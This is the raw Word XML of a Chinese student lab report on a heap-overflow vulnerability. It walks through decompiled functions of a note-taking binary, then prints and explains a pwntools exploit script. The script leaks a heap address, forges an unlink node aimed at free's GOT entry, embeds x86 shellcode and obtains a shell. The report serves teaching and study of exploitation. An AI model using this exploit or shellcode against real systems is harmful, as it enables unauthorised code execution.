        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>同时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>在每次迭代中，函数计算当前节点字符串的长度（位于 a1 + 12 的位置），并使用 snprintf 将格式化的字符串（包括元素的序号和内容）打印到 s 缓冲区中。接着，使用 write 函数将缓冲区 s 中的内容写入标准输出。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更新和追踪元素索引</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>在循环中，v6 用作元素的序号。它从 2 开始，每打印一个元素后递增。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0" w:name="_Toc21441"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sub_8048ABF</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3564890" cy="3699510"/>
            <wp:effectExtent l="0" t="0" r="3810" b="889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4225" cy="3081655"/>
            <wp:effectExtent l="0" t="0" r="3175" b="444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堆栈保护和缓冲区初始化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">使用 </w:t>
      </w:r>
      <w:r>
        <w:t>__readgsdword(0x14u)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve"> 进行堆栈保护，这是一种常用的安全措施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使用 memset 初始化一个64字节的字符数组 buf，将其全部元素设为 0。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:left="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检查链表是否为空</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>函数首先检查 a1 指针是否非空。如果为空，函数向标准输出打印 "no notes"，然后返回。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:left="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读取并匹配标题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>向用户请求输入一个标题，并将输入的标题读入 buf 缓冲区。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>之后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>遍历链表，查找与输入的标题匹配的节点。使用 strncmp 函数比较 buf 中的标题和链表节点中存储的标题（位于 v7 + 12）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:left="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打印匹配节点的详细信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>如果找到匹配的节点，函数使用 write 函数输出该节点的详细信息，包括：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>标题（存储在 v7 + 12）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>节点的内存位置（使用 snprintf 将地址格式化为字符串）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>类型（存储在 v7 + 76）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>内容（存储在 v7 + 108）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>每次 write 调用都会计算要写入的数据的长度，并将其输出到标准输出。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default"/>
        </w:rPr>
        <w:t>遍历链表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>如果当前节点的标题不匹配，函数会继续遍历链表，通过更新 v7 指针来访问下一个节点。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1" w:name="_Toc21886"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1.6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sub_8048D09</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3479800" cy="2687320"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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45510" cy="2127885"/>
            <wp:effectExtent l="0" t="0" r="8890" b="571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堆栈保护和缓冲区初始化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">使用 </w:t>
      </w:r>
      <w:r>
        <w:t>__readgsdword(0x14u)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve"> 进行堆栈保护，这是一种常用的安全措施。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使用 memset 初始化一个1024字节的字符数组 buf，将其全部元素设为 0。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:left="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检查链表是否为空</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>函数首先检查 a1 指针是否非空。如果为空，函数向标准输出打印 "no notes"，然后返回。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读取并匹配标题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>向用户请求输入一个标题，并将输入的标题读入 buf 缓冲区。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>之后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>遍历链表，查找与输入的标题匹配的节点。使用 strncmp 函数比较 buf 中的标题和链表节点中存储的标题（位于 v3 + 12）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:left="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更新找到的节点内容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>如果找到匹配的节点，函数提示用户输入新的内容。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使用 read 函数从标准输入读取新内容，并将其存储到找到的节点的内容部分（位于 v3 + 108）。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>最后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>使用 strcpy 将读取的新内容复制到该节点的内容部分。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2" w:name="_Toc31321"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1.7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sub_8048E99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将该函数进行反汇编得到的结果如下图所示</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3112135" cy="3075940"/>
            <wp:effectExtent l="0" t="0" r="12065" b="1016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1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4085" cy="1972945"/>
            <wp:effectExtent l="0" t="0" r="5715" b="82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该函数的功能是：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t>堆栈保护和初始化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">使用 </w:t>
      </w:r>
      <w:r>
        <w:t>__readgsdword(0x14u)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve"> 进行堆栈保护，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初始化 buf 数组和 v6 变量为 0。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检查堆栈是否为空</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>函数首先检查由 a1 指向的堆栈是否为空。如果是空的，函数向标准输出打印 "no notes"，然后返回。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:left="420" w:leftChars="0"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获取并验证节点地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>如果堆栈不为空，函数向用户请求输入一个节点的位置，并通过 read 从标准输入读取这个位置，存储在 buf 中。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>使用 strtol 将输入的字符串转换为地址，并将这个地址存储在 ptr 中。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>之后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>检查 ptr 是否指向有效的堆栈节点，方法是比较 *ptr（节点自身的地址）和 ptr 是否相同。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删除节点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>如果 ptr 是有效的堆栈节点，函数会根据节点的位置在堆栈中执行不同的操作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eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>如果 ptr 是堆栈顶部的节点，函数会更新堆栈顶部的指针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/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>如果 ptr 在堆栈中间，函数会更新前一个和后一个节点的指针，从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而从链表中移除 ptr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  <w:bidi w:val="0"/>
        <w:ind w:left="840" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>如果 ptr 是堆栈底部的节点，函数仅更新前一个节点的指针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  <w:bidi w:val="0"/>
        <w:ind w:left="840" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>最后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>，函数使用 write 向标准输出打印 "succeed!\n\n"。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default"/>
        </w:rPr>
        <w:t>释放内存和返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>使用 free(ptr) 释放 ptr 所指向的内存。最后，函数返回一个用于检测堆栈保护完整性的值，这是通过将初始读取的 v7 值与函数结束时的堆栈保护值异或得到的。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32637"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4.2分析攻击程序代码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1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文件heap_overflow_exp.py的程序代码如下所示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pwn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*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p=process(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'heap-overflow'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"1\n"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"title\n"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#Title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"type\n"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#Type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"content\n"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4"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>#Content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"3\n"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"title\n"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location=p.recv()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location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location=location.split(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':'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]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location=location.split(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'\n'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]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location=int(location,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location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"4\n"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"title\n"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shellcode=p32(location+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108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shellcode+=p32(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FFFFF"/>
        </w:rPr>
        <w:t>0x0804a448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shellcode+=p32(location+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108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12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shellcode+=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"\x90\x90\xeb\x04"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shellcode+=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"AAAA"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payload=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"\xd9\xed\xd9\x74\x24\xf4\x58\xbb\x17\x0d\x26\x77\x31"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payload+=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"\xc9\xb1\x0b\x83\xe8\xfc\x31\x58\x16\x03\x58\x16\xe2"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payload+=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"\xe2\x67\x2d\x2f\x95\x2a\x57\xa7\x88\xa9\x1e\xd0\xba"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payload+=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"\x02\x52\x77\x3a\x35\xbb\xe5\x53\xab\x4a\x0a\xf1\xdb"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payload+=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"\x45\xcd\xf5\x1b\x79\xaf\x9c\x75\xaa\x5c\x36\x8a\xe3"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payload+=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"\xf1\x4f\x6b\xc6\x76"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shellcode+=payload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print(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.join((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r'\x%2x'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%ord(c)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c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shellcode)))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+shellcode+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"\n"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p.send(shellcode+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p.send(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"5\n"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input=hex(location+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8F8F8"/>
        </w:rPr>
        <w:t>108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input=input.split(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FFFFF"/>
        </w:rPr>
        <w:t>'x'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)[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4"/>
          <w:szCs w:val="14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]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p.send(input+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4"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="F8F8F8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4"/>
          <w:szCs w:val="14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FFFFF"/>
        </w:rPr>
        <w:t> p.recv()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80" w:lineRule="atLeast"/>
        <w:ind w:left="450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4"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>p.interactive()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该脚本的功能为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（1）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>节点创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>通过一系列的 send</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve"> 和 recv 调用与进程交互。每次 send 发送特定的输入，如选项编号和数据（标题、类型、内容），每次 recv 接收程序的响应。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val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查看节点信息，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>泄露内存地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>通过发送 "3\n"，脚本选择一个显示特定笔记详情的选项，然后通过发送 "title\n" 来请求特定笔记的位置。接收到的响应中包含了笔记的内存位置，脚本解析这个地址并转换为十六进制数。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构造shellcode。首先跳转到了当前块的content位置，然后从该位置开始构建一个节点，节点的flink装入的地址为free函数的GOT表地址减8。在终端中查看free函数的GOT表地址的结果如下图所示</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4185920" cy="270319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可以得出应当写入节点flink的地址应为0804a450h-8h=0804a448h。节点的blink装入恶意代码的地址。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val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default"/>
        </w:rPr>
        <w:t>利用堆溢出漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>通过发送 "4\n"，脚本选择一个更新笔记内容的选项，并发送构造好的 shellcode 作为新的内容触发了堆溢出漏洞，允许 shellcode 被执行。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default"/>
        </w:rPr>
        <w:t>尝试执行 shellcode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>最后，通过发送 "5\n" 和相关的输入，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>进行删除节点操作，这时候程序将shellcode的地址写入到free函数的GOT表的对应位置，所以程序在调用free函数时会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>触发 shellcode 的执行。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>从而完成整个攻击的过程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN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" w:name="_Toc32547"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1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直接使用python2.7运行该程序得到的结果如下图所示</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4636770" cy="2856230"/>
            <wp:effectExtent l="0" t="0" r="1143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40735" cy="1924050"/>
            <wp:effectExtent l="0" t="0" r="1206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在shell中输入ls后可以看到能够返回出目录下的所有文件名，有此可知，该脚本的攻击过程成功，能够成功操控目标的shell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bidi w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc21613"/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实验心得体会</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>在完成这个关于堆操作漏洞的软件安全实验中，我首先通过理论学习掌握了堆溢出的基本概念和原理，了解了它在软件安全领域的重要性。实验过程中，我</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通过应用</w:t>
      </w:r>
      <w:r>
        <w:t>脚本来触发并利用这些漏洞，这个过程对我理解编程语言和操作系统如何交互产生了深远影响。通过分析数据和实验结果，我意识到即使是小小的编程错误也可能导致严重的安全问题。这次实验不仅提升了我的技术技能，还加深了我对于编程细节和软件安全的重视。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="31"/>
      </w:pPr>
      <w:r>
        <w:t>窗体底端</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr>
      <w:footerReference r:id="rId6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</w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p>
    <w:pPr>
      <w:pStyle w:val="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DA2CFD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C4DA2C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g4YjkyOTNjNzViYmEwYjYzY2ZhYmY1MGM3OTNiOWUifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00172A27"/>
    <w:rsid w:val="00001502"/>
    <w:rsid w:val="00003790"/>
    <w:rsid w:val="00004CA8"/>
    <w:rsid w:val="000443C5"/>
    <w:rsid w:val="000B6AB2"/>
    <w:rsid w:val="000C47E5"/>
    <w:rsid w:val="000D1524"/>
    <w:rsid w:val="000D54FD"/>
    <w:rsid w:val="000E3F56"/>
    <w:rsid w:val="00115A7C"/>
    <w:rsid w:val="001324D7"/>
    <w:rsid w:val="0013424A"/>
    <w:rsid w:val="0014659B"/>
    <w:rsid w:val="00155AB8"/>
    <w:rsid w:val="00172A27"/>
    <w:rsid w:val="00176036"/>
    <w:rsid w:val="0018510C"/>
    <w:rsid w:val="001D0CA2"/>
    <w:rsid w:val="001D1447"/>
    <w:rsid w:val="001D255C"/>
    <w:rsid w:val="001F25EC"/>
    <w:rsid w:val="001F764B"/>
    <w:rsid w:val="00202553"/>
    <w:rsid w:val="00207073"/>
    <w:rsid w:val="002333EB"/>
    <w:rsid w:val="00253F81"/>
    <w:rsid w:val="00301EE0"/>
    <w:rsid w:val="00323F27"/>
    <w:rsid w:val="003247E3"/>
    <w:rsid w:val="003358B5"/>
    <w:rsid w:val="003423CA"/>
    <w:rsid w:val="003513FE"/>
    <w:rsid w:val="003566AF"/>
    <w:rsid w:val="00376291"/>
    <w:rsid w:val="00390896"/>
    <w:rsid w:val="003A2227"/>
    <w:rsid w:val="003C1F8F"/>
    <w:rsid w:val="003F4876"/>
    <w:rsid w:val="004249FC"/>
    <w:rsid w:val="00425B43"/>
    <w:rsid w:val="0044155E"/>
    <w:rsid w:val="004B4A32"/>
    <w:rsid w:val="004C3B39"/>
    <w:rsid w:val="004E0258"/>
    <w:rsid w:val="00502EE6"/>
    <w:rsid w:val="00517420"/>
    <w:rsid w:val="005627BB"/>
    <w:rsid w:val="005649E0"/>
    <w:rsid w:val="00597AB5"/>
    <w:rsid w:val="005E7321"/>
    <w:rsid w:val="00603477"/>
    <w:rsid w:val="0062227A"/>
    <w:rsid w:val="00632E09"/>
    <w:rsid w:val="006410C2"/>
    <w:rsid w:val="0064226E"/>
    <w:rsid w:val="006632E4"/>
    <w:rsid w:val="0066602F"/>
    <w:rsid w:val="006729C9"/>
    <w:rsid w:val="00673A45"/>
    <w:rsid w:val="00691613"/>
    <w:rsid w:val="0069388C"/>
    <w:rsid w:val="00697416"/>
    <w:rsid w:val="007155C1"/>
    <w:rsid w:val="00733048"/>
    <w:rsid w:val="0074510E"/>
    <w:rsid w:val="00757527"/>
    <w:rsid w:val="00763989"/>
    <w:rsid w:val="00775F73"/>
    <w:rsid w:val="00792454"/>
    <w:rsid w:val="007D0CDC"/>
    <w:rsid w:val="00807FAD"/>
    <w:rsid w:val="00826917"/>
    <w:rsid w:val="00877065"/>
    <w:rsid w:val="00890B4D"/>
    <w:rsid w:val="008C38FE"/>
    <w:rsid w:val="008C4E1B"/>
    <w:rsid w:val="008C6B27"/>
    <w:rsid w:val="008D07AE"/>
    <w:rsid w:val="00902D22"/>
    <w:rsid w:val="0090541A"/>
    <w:rsid w:val="0091095B"/>
    <w:rsid w:val="00917E16"/>
    <w:rsid w:val="00920889"/>
    <w:rsid w:val="009231F2"/>
    <w:rsid w:val="00933C4A"/>
    <w:rsid w:val="009803C4"/>
    <w:rsid w:val="00982DC9"/>
    <w:rsid w:val="00987E4C"/>
    <w:rsid w:val="009B4E0B"/>
    <w:rsid w:val="009F1C68"/>
    <w:rsid w:val="00A0283B"/>
    <w:rsid w:val="00A1533E"/>
    <w:rsid w:val="00A3656B"/>
    <w:rsid w:val="00A63781"/>
    <w:rsid w:val="00A82408"/>
    <w:rsid w:val="00A85606"/>
    <w:rsid w:val="00AA1A6F"/>
    <w:rsid w:val="00AB5852"/>
    <w:rsid w:val="00AC129D"/>
    <w:rsid w:val="00AC56D8"/>
    <w:rsid w:val="00AC6BBD"/>
    <w:rsid w:val="00AF361D"/>
    <w:rsid w:val="00B05093"/>
    <w:rsid w:val="00B14399"/>
    <w:rsid w:val="00B50D9A"/>
    <w:rsid w:val="00B96187"/>
    <w:rsid w:val="00BC2A08"/>
    <w:rsid w:val="00BE45FC"/>
    <w:rsid w:val="00BF1739"/>
    <w:rsid w:val="00BF7FEC"/>
    <w:rsid w:val="00C05458"/>
    <w:rsid w:val="00C2031D"/>
    <w:rsid w:val="00C222E8"/>
    <w:rsid w:val="00C41228"/>
    <w:rsid w:val="00C45E85"/>
